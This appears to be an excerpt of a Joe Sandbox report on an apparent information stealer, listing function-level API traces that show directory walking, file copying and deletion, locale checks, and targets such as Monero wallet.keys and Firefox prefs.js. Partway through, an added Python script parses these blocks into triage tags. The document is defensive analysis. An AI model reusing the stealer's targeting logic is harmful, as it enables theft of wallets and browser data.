                           • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 180737720-1013718255
                          • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                          • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                          • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                          • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                          • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                          • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                          • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: prefs.js
                          • API String ID: 3334442632-3783873740
                          • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                          • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                          • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                          • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042510C,?,?,?,004251B4,?,?,00000000,?,00000000), ref: 00401923
                          • StrCmpCA.SHLWAPI(?,0042525C), ref: 00401973
                          • StrCmpCA.SHLWAPI(?,00425304), ref: 00401989
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                          • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                          • FindClose.KERNEL32(000000FF), ref: 00401E32
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 1415058207-1173974218
                          • Opcode ID: 5ea82217d710e172e365d67747ade50ceb9e1d6b8b6faf2988abcee8d56b9610
                          • Instruction ID: 39d00e11cde3818330ac08f623c81c852c64dcafcc1d6f8b5eceb62ce14d4984
                          • Opcode Fuzzy Hash: 5ea82217d710e172e365d67747ade50ceb9e1d6b8b6faf2988abcee8d56b9610
                          • Instruction Fuzzy Hash: F51260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                          • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                          • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                          • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                          • String ID: \*.*
                          • API String ID: 2325840235-1173974218
                          • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                          • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                          • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                          • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                          • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                          • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                          • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                          • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                          • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                          • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
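The function blocks above share one shape: a path is built with wsprintfA ("%s\%s", "%s\*", "%s\*.*") or with the lstrcpy/lstrcat helpers at 0041A740/0041A920/0041A9B0, FindFirstFileA opens the listing, two StrCmpCA calls against adjacent constant strings sit right after it, FindNextFileA/FindClose finish the loop, and one variant additionally calls CopyFileA and DeleteFileA. The following is an added example, not code from the report or the sample, that turns these "APIs" bullets into triage tags: it parses the line format the Joe Sandbox IDA plugin prints (direct calls, "Part of subcall function" calls, and calls without an argument list such as wsprintfA), collects any string arguments the plugin resolved, and applies a small rule table. The tag names, the rule table and the "." / ".." skip heuristic are mine; the sample block is copied from the CopyFileA/DeleteFileA function above.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# One "APIs" bullet of a Joe Sandbox function block. Three shapes occur in the report:
#   FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
#   Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
#   wsprintfA.USER32 ref: 00413EC3            (no argument list printed)
API_LINE = re.compile(
    r"^\s*[•*-]?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# "String ID" bullets list the function's string literals separated by '$'.
STRING_ID_LINE = re.compile(r"^\s*[•*-]?\s*String ID:\s*(?P<ids>.*)$")
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")

# Rule table (my labels, not Joe Sandbox's): a tag applies when every listed
# import is called by the block, directly or from one of its subcalls.
CAPABILITIES = [
    ("directory enumeration", {"FindFirstFileA", "FindNextFileA", "FindClose"}),
    ("copy-then-delete file handling", {"CopyFileA", "DeleteFileA"}),
    ("keyboard layout / locale enumeration", {"GetKeyboardLayoutList", "GetLocaleInfoA"}),
    ("path building with lstrcpy/lstrcat", {"lstrcpy", "lstrcat"}),
]


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: int                 # call-site address printed after "ref:"
    subcall: int | None      # callee address when the call sits inside a subcall


@dataclass
class FunctionSummary:
    calls: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)      # resolved literal args + String ID entries
    capabilities: list[str] = field(default_factory=list)


def parse_api_line(line: str) -> ApiCall | None:
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    sub = int(m.group("sub"), 16) if m.group("sub") else None
    return ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), sub)


def literal_args(call: ApiCall) -> list[str]:
    # '?' is an argument the plugin could not resolve and 8-hex-digit tokens are
    # addresses or constants; anything else is a string the plugin resolved.
    return [a for a in call.args if a != "?" and not HEX8.match(a)]


def summarize(block: str) -> FunctionSummary:
    s = FunctionSummary()
    for line in block.splitlines():
        call = parse_api_line(line)
        if call:
            s.calls.append(call)
            s.strings.extend(literal_args(call))
            continue
        m = STRING_ID_LINE.match(line)
        if m:
            s.strings.extend(x for x in m.group("ids").split("$") if x)
    names = {c.api for c in s.calls}
    s.capabilities = [tag for tag, needed in CAPABILITIES if needed <= names]
    # Heuristic: exactly two StrCmpCA calls between FindFirstFileA and FindNextFileA
    # (in call-site address order) is the usual skip of the "." and ".." entries.
    order = [c.api for c in sorted((c for c in s.calls if c.subcall is None), key=lambda c: c.ref)]
    if "FindFirstFileA" in order and "FindNextFileA" in order:
        lo, hi = order.index("FindFirstFileA"), order.index("FindNextFileA")
        if order[lo:hi].count("StrCmpCA") == 2:
            s.capabilities.append("skips '.'/'..' entries (heuristic)")
    return s


# Constructed input: a subset of the CopyFileA/DeleteFileA block from the report.
SAMPLE_BLOCK = r"""APIs
  • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042510C,?,?,?,004251B4,?,?,00000000,?,00000000), ref: 00401923
• StrCmpCA.SHLWAPI(?,0042525C), ref: 00401973
• StrCmpCA.SHLWAPI(?,00425304), ref: 00401989
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
• DeleteFileA.KERNEL32(00000000), ref: 00401DCA
• FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
• FindClose.KERNEL32(000000FF), ref: 00401E32
  • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
  • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
Strings
• String ID: \*.*
"""

if __name__ == "__main__":
    summary = summarize(SAMPLE_BLOCK)
    print(len(summary.calls), "calls")
    print("strings:", summary.strings)
    print("tags:", summary.capabilities)
```

Paste each "APIs ... Strings" block of the report into summarize(); the tags are triage labels and the skip heuristic is inferred from call order only, so confirm both against the disassembly before relying on them. Literal arguments such as \Monero\wallet.keys come from the plugin's resolution and are the quickest pointers to what a given walk is targeting.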
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: .v>~$0r/$4'Gk$CF{$C\`$Qd$YQ<$a&n$q#zB
                          • API String ID: 0-3321932839
                          • Opcode ID: 7dbbe45b65a982a2dc1055af29a1a86fc881a20b4be650756c30c91d43360494
                          • Instruction ID: 4d90128637c36b9c962f9b707912ee112e280b47cdcc22ebe14bff668f08c976
                          • Opcode Fuzzy Hash: 7dbbe45b65a982a2dc1055af29a1a86fc881a20b4be650756c30c91d43360494
                          • Instruction Fuzzy Hash: 87B20AF360C2049FE3046E2DEC85A7AB7D9EFD4720F1A853DEAC4C7744E93598058696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: >{}$/G5$CA[e$O<ww$PA7$vL/{$x#td${=s
                          • API String ID: 0-3150352856
                          • Opcode ID: 47c6e93481a51081abff104e8fbb60d24178ae6cc5659198aa22b93001d09270
                          • Instruction ID: 32dfd952fe471e7d546efa0cfc136643145d96fa83b204e6424388b826c3b112
                          • Opcode Fuzzy Hash: 47c6e93481a51081abff104e8fbb60d24178ae6cc5659198aa22b93001d09270
                          • Instruction Fuzzy Hash: CFB2E7F3A0C614AFE304AE2DDC8577AB7E9EF94320F16453DEAC4C7744EA3598018696
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                          • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                          • LocalFree.KERNEL32(00000000), ref: 00417D22
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                          • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                          • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                          • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                          • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                          • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 433455689-1173974218
                          • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                          • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                          • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                          • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: *o$Z6]$jG_$m.>=$sg?_$]X
                          • API String ID: 0-3931413294
                          • Opcode ID: 8bbb84bb6aaf109e494c0f5fefb271528db971104d2b73c5b11516cedf809f00
                          • Instruction ID: 6c8a1aad88b9cc77a1a45e4a294c16866969c45720f22bc4be6f59a9e2aac67e
